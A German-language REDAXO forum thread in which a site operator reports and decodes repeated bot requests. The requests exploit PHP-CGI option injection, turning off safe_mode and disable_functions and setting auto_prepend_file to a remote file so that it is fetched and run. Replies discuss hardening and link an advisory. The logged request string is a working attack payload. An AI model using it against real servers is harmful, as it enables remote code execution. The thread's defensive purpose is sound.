REDAXO Forum

Ich hatte gestern auf einer Redaxo Installation sehr seltsame Seitenaufrufe. Mir ist schon vor längerer Zeit aufgefallen das bei dieser Domain extrem viele komische Bots unterwegs sind mit Aufrufen wie /admin, /administrator usw... daher habe ich das etwas im Auge behalten.

Gestern war ein ganz seltsamer Bot da der 17 mal in folgender Form Aufrufe machte:

/mail.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F<<<ip-internetanbieter-usa>>>%2Fchanglog.txt

safe_mode=Off
disable_functions=NULL
allow_url_fopen=On
allow_url_include=On
auto_prepend_file=http://<<<ip-internetanbieter-usa>>>/changlog.txt

Die IP des Bots gehört der France Telecom S.A.

Kennt Ihr solche Aufrufe bzw. hattet das auch schon?

url_fopen und url_include sollten nach Möglichkeit immer deaktiviert sein, dann sind Dir auch solche Bots egal

Rüdiger

so wie es aussieht versucht der Bot aber genau das umzustellen. Wenn er das schaffen würde wäre es ja egal welche Einstellungen zuvor aktiv waren.

Hier habe ich noch was dazu gefunden:
https://isc.sans.edu/diary/PHP+vulnerab ... wild/13312

scheinbar war ein Angriff in der Form in einer php5.3er Version auf einigen Plattformen möglich.

Ich habe das gleiche Problem. Wahrscheinlich muss man benutzerdefiniert installieren.